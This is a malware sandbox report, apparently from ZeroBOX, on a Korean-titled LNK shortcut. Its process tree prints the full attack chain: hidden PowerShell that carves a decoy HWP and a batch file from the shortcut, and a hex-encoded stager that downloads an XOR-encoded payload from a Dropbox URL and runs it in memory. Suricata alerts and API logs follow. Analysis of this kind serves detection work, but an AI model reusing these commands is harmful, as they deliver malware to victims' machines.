popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

북한최고인민회의 결과.lnk

Generic Malware PostScript PS Downloader Antivirus HWP HTTP ScreenShot Create Service KeyLogger Internet API P2P Hide_URL DGA Http API FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential AntiDebug Lnk Format AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 27, 2023, 7:43 p.m. Oct. 27, 2023, 7:45 p.m.
Size 50.7MB
Type MS Windows shortcut, Has Description string, Has command line arguments, Icon number=1, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 cc96ba45dd2b6a6d7aa300d77e49c095
SHA256 315728c3ea5e769a4cc84cbaf611ee8790fe39b94a6e94ee257c63992d1487c9
CRC32 CC444315
ssdeep 1536:vJAzG8UqVmtD/xE8gANk+BPXXzvEL0hg3R9b:vsG8UqVmtLxEUk+DvNgR9b
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Microsoft_Office_File_Zero - Microsoft Office File
  • Antivirus - Contains references to security software
  • Lnk_Format_Zero - LNK Format
  • HWP_file_format - HWP Document File
  • Win32_HWP_PostScript_Zero - Detect a HWP with embedded Post Script code
  • Generic_Malware_Zero - Generic Malware

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "XlbEBpLSkcrGBoyr" "C:\Users\test22\AppData\Local\Temp\북한최고인민회의 결과.lnk"

    2552

    • cmd.exe "C:\Windows\SysWOW64\cmd.exe" /k echo SET a=power>C:\Users\Public\032310.bat&&echo SET b=shell.exe>>C:\Users\Public\032310.bat&&echo SET M=%a%%b%>>C:\Users\Public\032310.bat&&echo call %M% -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x032B004C} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000130A, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00011400;$lnkFile.Read($pdfFile, 0, 0x00011400);$PdfPath = $lnkPath.Replace('.lnk','.hwp');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0001270A,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'031023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;">>C:\Users\Public\032310.bat&& start /min C:\Users\Public\032310.bat&&exit

      2684

      • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\032310.bat

        2780

        • powershell.exe powershell.exe -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x032B004C} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000130A, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00011400;$lnkFile.Read($pdfFile, 0, 0x00011400);$PdfPath = $lnkPath.Replace('.lnk','.hwp');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0001270A,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'031023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;"

          2864

          • Hwp.exe "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\북한최고인민회의 결과.hwp"

            2956

          • cmd.exe cmd /c ""C:\Users\Public\031023.bat""

            2992

            • cmd.exe c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"

              3044

              • cmd.exe C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od

                2084

              • powershell.exe C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"

                1356

Name Response Post-Analysis Lookup
dl.dropboxusercontent.com
CNAME edge-block-www-env.dropbox-dns.com
A 162.125.84.15
162.125.84.15
IP Address Status Action
162.125.84.15 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49221 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49224 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49221 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49247 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49224 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49247 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49221 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49224 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49247 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49222 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49222 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49225 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49267 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49225 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49267 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49225 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49237 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49267 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49237 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49222 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49237 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49226 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49226 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49226 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49231 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49246 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49231 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49246 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49231 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49246 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49241 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49241 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49241 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49253 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49263 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49253 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49263 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49242 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49263 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49253 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49242 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49242 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49266 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49266 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49252 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49266 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49252 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49252 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49257 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49257 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49257 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49262 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49262 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49262 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49227 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49227 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49227 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49230 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49230 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49230 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49236 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49236 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49236 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49256 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49256 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49256 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49253 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49267 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49247 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49263 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49221 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49226 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49230 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49262 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49225 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49257 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49236 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49241 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49231 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49242 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49227 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49256 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49237 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49222 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49224 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49266 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49246 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49252 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: SET
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: a=power
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: SET
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: b=shell.exe
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: SET
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: M=powershell.exe
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: call
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: powershell.exe -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x032B004C} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000130A, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00011400;$lnkFile.Read($pdfFile, 0, 0x00011400);$PdfPath = $lnkPath.Replace('.lnk','.hwp');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0001270A,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'031023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /min c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6